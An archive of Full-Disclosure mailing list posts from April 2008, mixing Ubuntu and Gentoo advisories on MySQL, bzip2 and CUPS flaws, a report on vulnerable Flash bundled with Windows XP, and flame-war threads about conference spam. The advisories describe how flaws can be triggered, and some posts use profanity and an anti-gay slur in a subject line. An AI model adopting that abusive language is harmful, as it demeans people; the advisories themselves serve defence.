Why did you cut the link out from the guy who says "I have sent a plea for
assistance to some of my contacts within the US government and hope others
do as well to get this issue resolved."
http://blog.securitynow.us/2008/03/19/storm-worm-russian-business-network-rbn/

And he isn't a nobody, http://blog.securitynow.us/about/

"I have worked as an employee and consultant to many large corporations
(Fortune 500) and government agencies along with non-profit groups
performing security auditing and secure system/solution design and
implementations."

So suck you foo,

n3td3v

From security at casearmour.net Wed Apr 2 22:22:52 2008
From: security at casearmour.net (CaseArmour.net Security Administrator)
Date: Wed, 02 Apr 2008 17:22:52 -0400
Subject: [Full-disclosure] Adobe Flash bundling vulnerabilities
Message-ID: <1207171372.26948.1245737023@webmail.messagingengine.com>

I'm noticing a disturbing trend of vulnerable versions of Flash (among other
runtimes) being distributed with lots of different software, and the list
now includes vendors such as Microsoft and -- Adobe.

Adobe AIR up through the last Windows beta bundled a known-vulnerable version
of Flash. I seem to have deleted my copy of the Beta 2 installer, so I can't
confirm what version, but I believe it was a 9.x-series. The Windows AIR
installer, AdobeAIRInstaller.exe (1.0.7.4880, md5sum
7F5646586EB25CEB2F5457B0BD144F59), presently available from the Adobe site,
has been updated to include Flash 9.0 r115, or at least that's the version
reported by the included Netscape plugin. In the future, I'm going to be
very careful about installing Adobe products, on the occasions that I'm
forced to.

Microsoft, unfortunately, still bundles Flash 6.0.79.0 with, as far as I can
tell, Windows XP, and every Windows XP service pack ever produced, up through
the SP3 RC2 builds. Installing or slipstreaming a service pack on Windows XP
installs the vulnerable Flash version, and installing a new Flash build from
Adobe *does not* uninstall the vulnerable version. I didn't realize this
until I was testing Secunia PSI on a newly-installed system.
I'm not experienced enough with IE or Explorer internals to tell whether
it's possible to convince a browser (or Outlook? or something else?)
instance to render a malicious applet with the older version, but I
wouldn't be surprised if it's possible. Even if it's not, I'm paranoid
about the possibility of a remote, non-privileged login or other access
being able to leverage the vulnerable Flash OCX. The install happens
whether or not the XP system in question already includes a newer Flash
build.

From jamie at canonical.com Wed Apr 2 22:29:38 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 2 Apr 2008 17:29:38 -0400
Subject: [Full-disclosure] [USN-588-2] MySQL regression
Message-ID: <20080402212938.GA6848@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-588-2             April 02, 2008
mysql-dfsg-5.0 regression
https://launchpad.net/bugs/209699
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mysql-server-5.0                5.0.22-0ubuntu6.06.9

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-588-1 fixed vulnerabilities in MySQL. In fixing CVE-2007-2692 for
Ubuntu 6.06, additional improvements were made to make privilege checks
more restrictive. As a result, an upstream bug was exposed which could
cause operations on tables or views in a different database to fail.
This update fixes the problem. We apologize for the inconvenience.

Original advisory details:

 Masaaki Hirose discovered that MySQL could be made to dereference a
 NULL pointer. An authenticated user could cause a denial of service
 (application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA
 table.
 This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232)

 Alexander Nozdrin discovered that MySQL did not restore database access
 privileges when returning from SQL SECURITY INVOKER stored routines. An
 authenticated user could exploit this to gain privileges. This issue does
 not affect Ubuntu 7.10. (CVE-2007-2692)

 Martin Friebe discovered that MySQL did not properly update the DEFINER
 value of an altered view. An authenticated user could use CREATE SQL
 SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges.
 (CVE-2007-6303)

 Luigi Auriemma discovered that yaSSL as included in MySQL did not
 properly validate its input. A remote attacker could send crafted
 requests and cause a denial of service or possibly execute arbitrary
 code. This issue did not affect Ubuntu 6.06 in the default installation.
 (CVE-2008-0226, CVE-2008-0227)

Updated packages for Ubuntu 6.06 LTS:
From py at gentoo.org Wed Apr 2 22:16:56 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 02 Apr 2008 23:16:56 +0200
Subject: [Full-disclosure] [ GLSA 200804-02 ] bzip2: Denial of Service
Message-ID: <47F3F7C8.4030506@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200804-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: bzip2: Denial of Service
      Date: April 02, 2008
      Bugs: #213820
        ID: 200804-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overread vulnerability has been discovered in Bzip2.

Background
==========

bzip2 is a free and open source lossless data compression program.
Affected packages
=================

    -------------------------------------------------------------------
     Package         /     Vulnerable     /                  Unaffected
    -------------------------------------------------------------------
  1  app-arch/bzip2            < 1.0.5                         >= 1.0.5

Description
===========

The Oulu University discovered that bzip2 does not properly check offsets
provided by the bzip2 file, leading to a buffer overread.

Impact
======

Remote attackers can entice a user or automated system to open a
specially crafted file that triggers a buffer overread, causing a Denial
of Service. libbz2 and programs linking against it are also affected.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All bzip2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-arch/bzip2-1.0.5"

References
==========

  [ 1 ] CVE-2008-1372
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5

From xploitable at gmail.com Wed Apr 2 23:33:50 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Apr 2008 23:33:50 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay
In-Reply-To: <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
Message-ID: <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>

I don't want people to get angry about this, this is actually a serious
issue that n3td3v has noticed, and those security guys who are subscribed
to more than one mailing list will understand.

Full-Disclosure, I want action taken on the *growing* amount of security
conference spam. It used to be acceptable, but these days it's becoming
intolerable.

I don't know who in the security community would set up a mailing list for
security conferences to advertise and get feedback from, but I think one
should be created. Gadi Evron might be able to set a security conference
mailing list up? I don't know. Who else is into the mailing list creation
business?

For sure though, there is an issue with Securityfocus accepting security
conference spam on their mailing lists, and it's not even funny now. The
security conferences spam lists like vuln-dev and pen-test and the
Securityfocus boys still accept it onto the mailing list, even though it's
been already accepted on the big main mailing lists a day or so before.
What happens is, folks who are good at security, and are subscribed to all
the mailing lists, get an inbox flooded with duplicate security conference
spam, and people aren't even interested.

People may think this isn't a big issue, but it is for me and I've been in
contact with people who agree with me, now let's take action now before we
get more security conference spam in our mail boxes.

Securityfocus, stop accepting every security conference e-mail onto *every*
mailing list, I'm becoming increasingly angry.

Now something's got to be done about this, and I'm calling for security
community support for this, as the growing number of security conferences
grow every year, and the problem will only get bigger and bigger, so let's
join as one to get this situation sorted.

Forwarded conversation
Subject: Let's outlaw mass security conference spamming its fucking gay
------------------------

From: *n3td3v*
Date: Wed, Apr 2, 2008 at 4:06 AM
To: n3td3v

I'm sick of the security conferences spamming every single fucking security
mailing list on the internet about their security conference, it's getting
out of hand now and there are more and more new conferences appearing by
the month.

Isn't it about time there was a new mailing list just for advertising and
talking about security conferences, fucking hell.

When you're subscribed to 20 or more mailing lists and each one is spammed
with the exact same advert, it becomes a fucking pain in the fucking neck.

Someone create a mailing list for security conferences, I'm going off my
head here!!!

Back in the day it was fine with getting e-mail once or twice a year about
a security conference, but now there are so many being announced that these
commercial ventures are creating their own unsolicited mail (SPAM)
eco-system.

I'm beginning to wonder when enough will be enough and a public outcry will
take place.
Already I've shouted down those fucks from offensive-security.com for doing
it, but I can't keep publicly flagging-as-spam every time because these
mass-multi-mailing-list-announcements-are-happening-more-often-now-than-not.
I would just end up sounding like a fucking parrot.

Fuck you security conferences you dick fucks, stop
mass-mailing-everyone-is-subscribed-to-the-same-mailing-lists-no-need-to-spam-every-single-one-you-fucking-morons.

No there won't be a n3td3v cyber security conference, I can't be fucked
anymore, it's a boring idea so die!!!

Why the fuck does securityfocus allow security conferences to spam every
single last mailing list of theirs? What the fuck!!!

I'm going crazy with the security conference spam insanity!!!

Regards,

n3td3v

----------
From: *Aaron Gray*
Date: Wed, Apr 2, 2008 at 5:22 PM
To: n3td3v at googlegroups.com

Don't agree with the gay bashing header, that's getting so boring.

But "someone create a mailing list for security conferences" is a pretty
sound idea.

"I'm going off my head here!!!", ain't you always...

----------
From: *n3td3v*
Date: Wed, Apr 2, 2008 at 5:40 PM
To: n3td3v at googlegroups.com

It's not a reference to homosexuals.

If they were non-commercial it would be fine, but what it amounts to is
commercial spam the same as viagra etc.

Back in the day it was only one or two conferences getting *mass* announced,
but now there are tons of conferences and they keep sending their shit to
every single e-mail list they can think of.

Nope... only when I see security conferences being spammed on *every*
mailing list possible. The result, about ten copies of the same e-mail
sitting on my mail box, asking me to purchase a ticket or buy security
training.

This has to be nipped in the bud at the highest priority and urgency!!!

It's SPAM, so let's not dress it up as something else... get these fucks
blacklisted like the viagra spammers!!!

Regards,

n3td3v
From ureleet at gmail.com Wed Apr 2 23:42:27 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 2 Apr 2008 18:42:27 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay
In-Reply-To: <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
Message-ID: <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>

"Full-Disclosure, I want action taken on the *growing* amount of security conference spam."

u do know that just because you demand or want action taken that it doesn't mean that such will take place right?

stop trolling.

From ureleet at gmail.com Wed Apr 2 23:46:34 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 2 Apr 2008 18:46:34 -0400
Subject: [Full-disclosure] n3td3v has a fan
Message-ID: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>

you like him because he posts ur articles.

you can have him.

stop trolling.

On Wed, Apr 2, 2008 at 5:17 PM, n3td3v wrote:
> On Wed, Apr 2, 2008 at 10:08 PM, Paul Schmehl wrote:
> > --On Wednesday, April 02, 2008 21:26:03 +0100 n3td3v wrote:
> > >
> > > No, it was sending signals to important people to take action to get it further pushed up the ladder. In no way do I expect my e-mail to be directly looked at by the white house. Through signal intelligence, the folks at GCHQ and NSA would see it and it would influence others who lurk on this list to take action. And for your information, that's what's happened.
> >
> > At first I thought, "How silly", but then I got to thinking about it.....
> >
> > I'll bet the NSA *does* monitor your communications. After all, spying is serious business. Those guys probably need an occasional laugh to break the tension. Monitoring your communications almost guarantees them a laugh every day.
>
> Why did you cut the link out from the guy who says "I have sent a plea for assistance to some of my contacts within the US government and hope others do as well to get this issue resolved."
> http://blog.securitynow.us/2008/03/19/storm-worm-russian-business-network-rbn/
>
> And he isn't a nobody, http://blog.securitynow.us/about/
>
> "I have worked as an employee and consultant to many large corporations (Fortune 500) and government agencies along with non-profit groups performing security auditing and secure system/solution design and implementations."
>
> So suck you foo,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From xploitable at gmail.com Thu Apr 3 00:09:06 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Apr 2008 00:09:06 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference spamming its fucking gay
In-Reply-To: <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>
Message-ID: <4b6ee9310804021609x6d0e9c86l91cfb79806be3f6d@mail.gmail.com>

On Wed, Apr 2, 2008 at 11:42 PM, Ureleet wrote:
> "Full-Disclosure, I want action taken on the *growing* amount of security conference spam."
>
> u do know that just because you demand or want action taken that it doesn't mean that such will take place right?
>
> stop trolling.
I'm not trolling if I want a security conference mailing list setup so the rest of us don't need to suffer an inbox of 20 identical commercial *come to our conference, or, book our training*.

This is a big issue, and if we don't create a mailing list for it, next year we won't have 20 duplicates per spam run, we'll have 40 per spam run.

Imagine if n3td3v post to *every* mailing list and not just *one*, would you not get tired and frustrated?

All the best,

n3td3v

From xploitable at gmail.com Thu Apr 3 00:13:53 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Apr 2008 00:13:53 +0100
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
Message-ID: <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com>

On Wed, Apr 2, 2008 at 11:46 PM, Ureleet wrote:
> you like him because he posts ur articles.
>
> you can have him.
>
> stop trolling.

I'm the one at the forefront of security trying to make a difference, and what are you? He supports me because of my cause to stop the Storm Worm, so what solutions have you got, instead of annoying everyone?

From jamie at canonical.com Thu Apr 3 00:17:09 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 2 Apr 2008 19:17:09 -0400
Subject: [Full-disclosure] [USN-598-1] CUPS vulnerabilities
Message-ID: <20080402231709.GB6848@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-598-1             April 02, 2008
cupsys vulnerabilities
CVE-2008-0047, CVE-2008-0053, CVE-2008-0882, CVE-2008-1373
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  cupsys                          1.2.2-0ubuntu0.6.06.8

Ubuntu 6.10:
  cupsys                          1.2.4-2ubuntu3.3

Ubuntu 7.04:
  cupsys                          1.2.8-0ubuntu8.3

Ubuntu 7.10:
  cupsys                          1.3.2-1ubuntu7.6

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that the CUPS administration interface contained a heap-based overflow flaw. A local attacker, and a remote attacker if printer sharing is enabled, could send a malicious request and possibly execute arbitrary code as the non-root user in Ubuntu 6.06 LTS, 6.10, and 7.04. In Ubuntu 7.10, attackers would be isolated by the AppArmor CUPS profile. (CVE-2008-0047)

It was discovered that the hpgl filter in CUPS did not properly validate its input when parsing parameters. If a crafted HP-GL/2 file were printed, an attacker could possibly execute arbitrary code as the non-root user in Ubuntu 6.06 LTS, 6.10, and 7.04. In Ubuntu 7.10, attackers would be isolated by the AppArmor CUPS profile. (CVE-2008-0053)

It was discovered that CUPS had a flaw in its managing of remote shared printers via IPP. A remote attacker could send a crafted UDP packet and cause a denial of service or possibly execute arbitrary code as the non-root user in Ubuntu 6.06 LTS, 6.10, and 7.04. In Ubuntu 7.10, attackers would be isolated by the AppArmor CUPS profile. (CVE-2008-0882)

It was discovered that CUPS did not properly perform bounds checking in its GIF decoding routines. If a crafted GIF file were printed, an attacker could possibly execute arbitrary code as the non-root user in Ubuntu 6.06 LTS, 6.10, and 7.04. In Ubuntu 7.10, attackers would be isolated by the AppArmor CUPS profile.
(CVE-2008-1373) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8.diff.gz Size/MD5: 97650 b7ac4b760066920314d4596541cf716e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8.dsc Size/MD5: 1049 26e617c4b5c0848d56f872895e279a86 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2.orig.tar.gz Size/MD5: 4070384 2c99b8aa4c8dc25c8a84f9c06aa52e3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.2.2-0ubuntu0.6.06.8_all.deb Size/MD5: 998 c7d4013c3b9e3655e2fd2e9719d4d2af amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 36218 9eff8fd692afe5ae17ca80f269a0ca6b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 81906 ac05150f42e5671c5cdc73ba8f85cb5b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 2286026 acd4a48c676556fc7260bbd86db0416b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 6096 3df7829bfb8766de94a4ef2ff0be824f http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 76654 0d67c8599d4e2accf4f7ee31b498fdc7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 25758 14617ef9d38146ceaf89b4e9775e2fb4 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_amd64.deb Size/MD5: 129498 5cd8c821b31dddde0c200a61570d48b6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 34766 88ac5bced1d508f9695b4b4f4ae0f82a 
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 77988 84db3f3ad17936d5015a26353c55bc6a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 2253492 2cc1ec94caf6344a555ece9f69b51fe2 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 6088 00226da0a854f64bd5b18ace219de031 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 75744 73038a225d7301b4b5f8085219c97c81 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 25740 52699a4b9dea621f4332db5856f8b574 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_i386.deb Size/MD5: 121718 2e904399c40c9f83e451bb2e964820c1 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 40464 7e6bd3ec6312eef104737ffed5e19c3c http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 89542 8b9353d17d9402495f2404a9ab837b92 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 2300680 65597d07917b8753a0af6f6aae1276db http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 6096 d6cb4780e6f4545bc8566cce92fb8346 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 78442 c75b4f47491227c2504649902a040855 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 25742 372a1c972e97e1722a844430780ae6c5 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_powerpc.deb Size/MD5: 127478 afad79a272bbe434675f24d7a3ca91ef sparc architecture (Sun 
SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 35396 b44ad7e913ff064d2a3fb73121771686 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 78724 a8bff0942be4b14ece6dde8fd38b6f5a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 2287122 2415f6a5410a63b98ba32ecdf8fbcfb7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 6094 384dc8a7b9c8dfbefa42d7b5fbb836c7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 75678 6258f4d4c1b55d90b34cee1caa12dc35 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 25740 ca7f1a4412f42d739d51c1ddbc09045a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_sparc.deb Size/MD5: 123214 801292f8a2652b579a82b7a7c52e9ffd Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3.diff.gz Size/MD5: 111410 fb84af4bcf007f2f7299394e0be32412 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3.dsc Size/MD5: 1059 430be555857b7aa5cc01431466487aaf http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4.orig.tar.gz Size/MD5: 4091480 46722ad2dc78b12b5c05db2d080fe784 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.2.4-2ubuntu3.3_all.deb Size/MD5: 870052 97e82b21269a8bb5e7ac995cc4cb665d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 36706 eb308fea40f4b7d159304b4b875b2329 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 82506 
3b04032674acc75d3184f537af144d3a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 1480680 18b1537c8238b225e6ba2bb51570b942 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 6122 b324305be458b5207d242efc230d06c1 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 95522 fce843ba1e5c51ec7a8161f0a0828acc http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 26138 041e52bad239d993b22d65873705a751 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_amd64.deb Size/MD5: 172282 cf3fd3c84c83b36aa453ca2e071ab74c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 36260 c2daeb19fee1ebfe794be09ebefef1c7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 80108 c599f739a103867967a78f91569db74e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 1463912 d22879a24e9f1ff1d12e7845ad596cc2 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 6124 01628551a9fc66423789f02853d0d9ba http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 95352 b6084c36087da3aa1a3c8d44f9a9d0a7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 26142 838499ddbf886c5514ef11c6e4bdeda9 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_i386.deb Size/MD5: 169404 8262471b1cdb9991fbde554a31c74508 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 41802 b703ca8629e5df46fc1f1d45acd20581 
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 91148 caca2486db7794b133539af9b939a607 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 1498496 0662d077dfae2d1b6b00db7a0966366b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 6128 792c5ee645b0f7a7e1d63d9206348c52 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 97682 b37660eb88a487e5f7c49b9ed6f1c937 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 26144 b834556e6374093f5652754dd8c0ff6a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_powerpc.deb Size/MD5: 172694 3174ff36eaa0bc4ac7f4df02299413ca sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 36292 2cd1ea5a42eff193ca8a4c2ec53aefa1 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 80238 10b95fff38cb0436cf30a30e683cc27d http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 1489214 119f077088e3b2009c896fd395448717 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 6128 204a14898a9508a980e71d33792cfb59 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 94574 a87580c3fd22da592dd5496190afb871 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 26142 e7b959209cad884220bb1cacb2cd0555 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_sparc.deb Size/MD5: 168700 1f717ec06409999b5a40bb89dcedb5b0 Updated packages for Ubuntu 7.04: Source archives: 
